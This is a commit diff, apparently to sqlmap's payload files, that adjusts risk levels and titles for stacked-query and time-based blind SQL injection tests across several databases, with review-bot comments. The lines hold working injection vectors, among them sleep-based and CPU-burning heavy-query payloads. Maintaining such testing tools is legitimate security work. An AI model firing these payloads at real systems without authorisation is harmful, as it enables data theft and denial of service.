Minor stacked queries and time-based payloads cleanup - issue #1169

Bernardo Damele 2015-02-20 15:44:06 +00:00
parent 79d4d970a5
commit 3b3205c532
2 changed files with 30 additions and 29 deletions


@ -6,7 +6,7 @@
<title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title> <title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
<stype>4</stype> <stype>4</stype>
<level>2</level> <level>2</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
@ -26,7 +26,7 @@
<title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title> <title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
<stype>4</stype> <stype>4</stype>
<level>4</level> <level>4</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
@ -47,7 +47,7 @@
<title>MySQL &gt; 5.0.11 stacked queries</title> <title>MySQL &gt; 5.0.11 stacked queries</title>
<stype>4</stype> <stype>4</stype>
<level>1</level> <level>1</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector> <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
@ -88,7 +88,7 @@
<title>PostgreSQL &gt; 8.1 stacked queries</title> <title>PostgreSQL &gt; 8.1 stacked queries</title>
<stype>4</stype> <stype>4</stype>
<level>1</level> <level>1</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector> <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
@ -129,7 +129,7 @@
<title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title> <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
<stype>4</stype> <stype>4</stype>
<level>4</level> <level>4</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector> <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
@ -151,7 +151,7 @@
<title>Microsoft SQL Server/Sybase stacked queries</title> <title>Microsoft SQL Server/Sybase stacked queries</title>
<stype>4</stype> <stype>4</stype>
<level>1</level> <level>1</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector> <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
@ -173,7 +173,7 @@
<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title> <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
<stype>4</stype> <stype>4</stype>
<level>5</level> <level>5</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector> <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
@ -213,7 +213,7 @@
<title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title> <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
<stype>4</stype> <stype>4</stype>
<level>5</level> <level>5</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector> <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
@ -233,7 +233,7 @@
<title>Oracle stacked queries (USER_LOCK.SLEEP)</title> <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
<stype>4</stype> <stype>4</stype>
<level>5</level> <level>5</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector> <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
@ -295,7 +295,7 @@
<title>HSQLDB &gt;= 1.7.2 stacked queries</title> <title>HSQLDB &gt;= 1.7.2 stacked queries</title>
<stype>4</stype> <stype>4</stype>
<level>3</level> <level>3</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector> <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
@ -316,7 +316,7 @@
<title>HSQLDB &gt;= 2.0 stacked queries</title> <title>HSQLDB &gt;= 2.0 stacked queries</title>
<stype>4</stype> <stype>4</stype>
<level>4</level> <level>4</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector> <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
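Review bot: The two HSQLDB stacked-queries tests (`HSQLDB &gt;= 1.7.2 stacked queries` and `HSQLDB &gt;= 2.0 stacked queries`) are only raised to risk 1, yet their vectors produce the delay with `REPEAT(...,[SLEEPTIME]00000000)` inside `REGEXP_SUBSTRING` rather than a sleep primitive, so the target spends the whole delay burning CPU; that is the heavy-query pattern which the time-based file in this same commit rates at risk 2 (the `BENCHMARK`-based PROCEDURE ANALYSE test and every title marked `(heavy query)`). I would bring them in line with `<risk>2</risk>` and name the technique in the title, e.g. `<title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query)</title>`, so a lower-risk run presumably does not select them. Whether the `[SLEEPTIME]00000000` repeat count yields a delay proportional to SLEEPTIME on HSQLDB cannot be verified from this hunk. Each `<test>` element shown here begins and ends outside the hunk.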


@ -207,7 +207,7 @@
<title>Microsoft SQL Server/Sybase time-based blind</title> <title>Microsoft SQL Server/Sybase time-based blind</title>
<stype>5</stype> <stype>5</stype>
<level>1</level> <level>1</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector> <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
@ -931,12 +931,13 @@
<!-- TODO: if possible, add payload for Microsoft Access --> <!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of OR time-based blind tests --> <!-- End of OR time-based blind tests -->
<!-- Time-based tests - After ORDER BY...LIMIT... --> <!-- Time-based tests - LIMIT clause -->
<!-- This payload does not work with SLEEP() -->
<test> <test>
<title>MySQL &gt;= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title> <title>MySQL &gt;= 5.1 heavy-query time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>2</risk>
<clause>1,2,3,4,5</clause> <clause>1,2,3,4,5</clause>
<where>1</where> <where>1</where>
<vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector> <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
@ -951,7 +952,7 @@
<dbms_version>&gt; 5.0.11</dbms_version> <dbms_version>&gt; 5.0.11</dbms_version>
</details> </details>
</test> </test>
<!-- Time-based tests - After ORDER BY...LIMIT... --> <!-- Time-based tests - LIMIT clause -->
<!-- Time-based blind tests - Parameter replace --> <!-- Time-based blind tests - Parameter replace -->
<test> <test>
@ -1177,7 +1178,7 @@
<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title> <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>0</risk> <risk>1</risk>
<clause>1,3</clause> <clause>1,3</clause>
<where>3</where> <where>3</where>
<vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector> <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
@ -1351,9 +1352,9 @@
<!-- End of time-based blind tests - Parameter replace --> <!-- End of time-based blind tests - Parameter replace -->
<!-- Time-based blind tests - GROUP BY and ORDER BY clauses --> <!-- Time-based blind tests - GROUP BY and ORDER BY clause -->
<test> <test>
<title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title> <title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clause</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
@ -1373,7 +1374,7 @@
</test> </test>
<test> <test>
<title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> <title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
@ -1392,7 +1393,7 @@
</test> </test>
<test> <test>
<title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clauses</title> <title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clause</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
@ -1412,7 +1413,7 @@
</test> </test>
<test> <test>
<title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> <title>PostgreSQL time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
@ -1431,7 +1432,7 @@
</test> </test>
<test> <test>
<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title> <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
@ -1473,10 +1474,10 @@
</test> </test>
<test> <test>
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title> <title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_LOCK.SLEEP)</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>0</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector> <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
@ -1492,7 +1493,7 @@
</test> </test>
<test> <test>
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title> <title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
@ -1511,7 +1512,7 @@
</test> </test>
<test> <test>
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> <title>Oracle time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
@ -1530,7 +1531,7 @@
</test> </test>
<test> <test>
<title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> <title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
@ -1551,7 +1552,7 @@
</test> </test>
<test> <test>
<title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> <title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
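Review bot: The closing comment of the LIMIT-clause group is renamed to the same text as its opening one — `<!-- Time-based tests - LIMIT clause -->` now appears both before the PROCEDURE ANALYSE test and after its `</test>` — whereas the neighbouring groups close with an `End of ...` marker (`<!-- End of OR time-based blind tests -->`, `<!-- End of time-based blind tests - Parameter replace -->`). I would change the second occurrence to `<!-- End of time-based tests - LIMIT clause -->` so the group boundary stays readable. The new `<!-- This payload does not work with SLEEP() -->` note would help a maintainer more if it also said why the vector uses `BENCHMARK()` instead, e.g. `<!-- This payload does not work with SLEEP(); the delay comes from BENCHMARK(), hence heavy-query and risk 2 -->`, assuming that is the reason, which the hunk does not state. The affected `<test>` element starts inside the hunk but its closing tag is in a later hunk.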